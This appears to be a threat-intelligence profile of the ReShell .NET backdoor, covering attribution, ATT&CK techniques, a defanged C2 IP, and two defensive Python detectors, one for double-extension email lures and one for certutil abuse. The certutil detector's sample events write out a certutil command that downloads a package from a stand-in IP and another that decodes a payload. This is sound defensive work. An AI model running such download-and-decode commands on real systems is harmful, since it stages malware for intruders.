ReShell
ReShell is a previously undocumented .NET backdoor used in China-linked cyber espionage operations. It was first identified by Palo Alto Networks Unit 42 in intrusion cluster CL-STA-0045, which Unit 42 attributed with moderate confidence to Alloy Taurus (aka GALLIUM/Softcell), and it has also been reported by Trend Micro as malware used by the China-nexus actor Earth Krahang. Trend Micro described Earth Krahang as targeting government entities worldwide since early 2022, with a strong focus on Southeast Asia and additional victims in Europe, the Americas, and Africa.
Observed delivery and access paths include exploitation of Microsoft Exchange Server vulnerabilities, deployment via web shells on already-compromised servers, and spear phishing. In the CL-STA-0045 activity, the attackers attempted to execute ReShell as a file named windows.exe; Unit 42 derived the ReShell name from the sample's PDB path. In Earth Krahang operations, ReShell was deployed during the initial stage of the attack alongside Cobalt Strike and XDealer.
Capabilities described with high confidence in the source reporting are information collection, file dropping, system command execution, and AES-encrypted command-and-control (C2) communication. Unit 42 reported a ReShell sample configured with the embedded C2 address 23.106.122[.]46, from which it receives commands for arbitrary execution. Trend Micro further stated that ReShell binaries are packed with ConfuserEX.
ReShell has been observed in long-term espionage intrusions against government-related targets, including a Southeast Asian government environment involving critical infrastructure, public healthcare institutions, public financial administrators, and ministries. In broader Earth Krahang reporting, the malware was associated with campaigns against government ministries and especially foreign affairs organizations. Related tooling observed in the same operations included China Chopper web shells, Cobalt Strike, Quasar RAT, GhostCringe, SoftEther VPN, Kerbrute, Mimikatz, ProcDump, Fscan, PlugX, ShadowPad, and XDealer/DinodasRAT.
Indicators and artifacts named in the source reporting are the filename windows.exe and the (defanged) C2 IP 23.106.122[.]46.
Groups observed using it
Two distinct threat actors attributed by public researchers: Earth Krahang (Trend Micro) and, with moderate confidence, Alloy Taurus in intrusion cluster CL-STA-0045 (Unit 42).
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
Techniques & procedures
13 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (4 techniques)
Earth Krahang abuses the trust between governments to conduct their attacks. We found that the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Since the malicious link uses a legitimate government domain of the compromised server, it will appear less suspicious to targets and may even bypass some domain blacklists.
Initial Access (3 techniques)
The threat actor abused the following vulnerabilities multiple times: CVE-2023-32315: command execution on OpenFire; CVE-2022-21587: command execution on Oracle Web Applications Desktop Integrator.
Earth Krahang also makes use of spear phishing email to attack its targets... In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Execution (2 techniques)
the emails are intended to trick their targets into opening attachments or embedded URL links that ultimately lead to the execution of a prepared backdoor file on the victim's machine.
Persistence (1 technique)
Privilege Escalation (1 technique)
Defense Evasion (1 technique)
backdoor filenames are usually related to geopolitical topics... 'Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe'
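To show how the double-extension lure quoted above can be caught at the mail gateway or in file-creation telemetry, here is an added Python example; it is not code from the Trend Micro or Unit 42 reports. The decoy and executable extension lists, every attachment name other than the quoted one, and the extra check for the Unicode Right-to-Left Override (a related masquerading trick that this page does not mention) are assumptions made for the example.

```python
import re
from typing import Optional

# Decoy extensions that make a file look like a document (constructed list, not from the reports).
DOC_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "rtf", "txt"}
# Extensions Windows runs on double-click; this is the real type of the lure.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta", "lnk", "msi"}
RTLO = "\u202e"  # Right-to-Left Override: visually reverses the tail of a file name


def classify_attachment(filename: str) -> Optional[str]:
    """Return a short reason if the name looks like an executable posing as a
    document, otherwise None. Case, surrounding whitespace and padding runs
    between the decoy and the real extension are normalised before matching,
    so 'Report.PDF   .SCR' is treated the same as 'report.pdf.scr'."""
    raw = filename.strip()
    name = re.sub(r"\s+", " ", raw.lower())
    parts = [p.strip() for p in name.split(".")]
    if len(parts) < 2:
        return None
    real = parts[-1]                      # what Windows will actually execute
    if real not in EXEC_EXTS:
        return None
    if RTLO in raw:
        # e.g. "agenda<RTLO>cod.exe" renders as "agendaexe.doc" in Explorer;
        # the final segment is still the extension Windows honours.
        return f"rtlo override hiding .{real}"
    if len(parts) >= 3 and parts[-2] in DOC_EXTS:
        return f"double extension .{parts[-2]}.{real}"
    return None


# Constructed attachment names; the first is the lure name quoted in the Trend Micro report.
SAMPLE_ATTACHMENTS = [
    "Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe",
    "Report.PDF   .SCR",
    "Budget_2022.xlsx",
    "meeting-notes.doc.txt",
    "setup.exe",
    "agenda\u202ecod.exe",
]


def scan_attachments(names: list) -> list:
    """Return (filename, reason) pairs for every name that classifies as a lure."""
    return [(n, r) for n in names if (r := classify_attachment(n))]


if __name__ == "__main__":
    for name, reason in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{reason}: {name!r}")
```

Feed it the attachment names from your mail gateway logs or the TargetFilename field of file-creation events; a plain `.exe` attachment is left to existing executable-blocking policy, since the point of this check is the document-shaped disguise, not executables in general.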
Command and Control (3 techniques)
Its binaries are packed with ConfuserEX and its command-and-control (C&C) communication is encrypted with the AES algorithm.
uses certutil commands to download and install the SoftEther VPN server.
its command-and-control (C&C) communication is encrypted with the AES algorithm.
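Because the certutil download noted above is a common living-off-the-land pattern, here is an added Python example, not code from either vendor report, that flags certutil process-creation events used to fetch or decode a payload. The event schema, hostnames, URL and file paths are constructed for the example; map the fields onto your EDR or Sysmon Event ID 1 (process create) data.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed schema for this example)."""
    host: str
    parent_image: str
    image: str
    cmdline: str


URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def _norm_token(tok: str) -> str:
    """Lower-case a token and fold certutil's '/flag' spelling into '-flag'."""
    if tok and tok[0] in "-/":
        return "-" + tok[1:].lower()
    return tok.lower()


def certutil_reasons(ev: ProcEvent) -> list:
    """Return the reasons (possibly none) a certutil event looks like payload staging."""
    if not ev.image.lower().endswith("certutil.exe"):
        return []
    tokens = [_norm_token(t) for t in ev.cmdline.split()]
    flags = {t for t in tokens if t.startswith("-")}
    has_url = any(URL_RE.match(t) for t in tokens)
    reasons = []
    if "-urlcache" in flags and has_url:
        reasons.append("remote download via -urlcache")
    if "-verifyctl" in flags and has_url:
        reasons.append("remote download via -verifyctl")
    if flags & {"-decode", "-decodehex"}:
        reasons.append("payload decode via -decode")
    return reasons


def hunt_certutil(events: list) -> list:
    """Scan events and return (host, reason, cmdline) for every suspicious certutil use."""
    hits = []
    for ev in events:
        for reason in certutil_reasons(ev):
            hits.append((ev.host, reason, ev.cmdline))
    return hits


# Constructed sample events: the first two mimic staging a VPN server package
# through certutil on a hypothetical web server; the last two are benign noise.
SAMPLE_EVENTS = [
    ProcEvent("gov-web-01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://203.0.113.5/vpnserver.zip C:\ProgramData\vpnserver.zip"),
    ProcEvent("gov-web-01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              r"certutil /decode C:\ProgramData\vpn.b64 C:\ProgramData\vpnserver.exe"),
    ProcEvent("hr-ws-22", r"C:\Windows\System32\mmc.exe",
              r"C:\Windows\System32\certutil.exe",
              r"certutil -store My"),
    ProcEvent("hr-ws-22", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for host, reason, cmd in hunt_certutil(SAMPLE_EVENTS):
        print(f"{host}: {reason}: {cmd}")
```

The URL check keeps ordinary certificate-store administration (`certutil -store`, `-verify`) out of the results; when a hit fires on a web server, also pull the parent process, since a web-shell-driven download will typically descend from the web server worker process rather than from an administrator's shell.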
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering network infrastructure (IPs, domains, DNS) and file hashes (MD5, SHA-1, SHA-256) linked to this family. The only value reproduced on this page is the C2 IP 23.106.122[.]46.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
A bespoke malware/backdoor used by Earth Krahang in espionage intrusions.
A simple .NET backdoor with capabilities to collect information, drop files, and execute system commands. Its binaries are packed with ConfuserEX and its C2 communication is encrypted with AES.
Previously unknown backdoor (per Unit 42) used for access/persistence in the described espionage cluster.
Previously undocumented .NET backdoor (windows.exe) configured with an embedded C2 IP to enable remote arbitrary command execution.